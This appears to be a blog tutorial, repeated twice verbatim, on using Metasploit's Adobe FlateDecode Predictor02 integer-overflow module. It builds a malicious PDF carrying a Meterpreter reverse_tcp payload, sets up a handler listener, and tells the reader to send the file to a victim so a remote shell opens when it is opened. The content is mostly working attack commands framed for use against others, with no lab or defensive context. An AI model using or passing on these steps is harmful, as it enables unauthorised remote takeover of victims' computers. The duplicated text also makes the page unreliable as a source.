Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets
0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement
Attacker: metasploit
Victim PC: Windows XP
Open terminal type
msfconsole
use exploit/windows/fileformat/adobe_flatedecode_predictor02
Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp
Msf exploit(adobe_flatedecode_predictor02)>show options
Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf
Msf exploit (adobe_flatedecode_predictor02)>exploit
After we successfully generate the malicious PDF, it will stored on your local computer
/root/.msf4/local/attack.pdf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send yourattack.pdffiles to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer
This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets
0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement
Attacker: metasploit
Victim PC: Windows XP
Open terminal type
msfconsole
use exploit/windows/fileformat/adobe_flatedecode_predictor02
Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp
Msf exploit(adobe_flatedecode_predictor02)>show options
Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf
Msf exploit (adobe_flatedecode_predictor02)>exploit
After we successfully generate the malicious PDF, it will stored on your local computer
/root/.msf4/local/attack.pdf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send yourattack.pdffiles to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer
No comments:
Post a Comment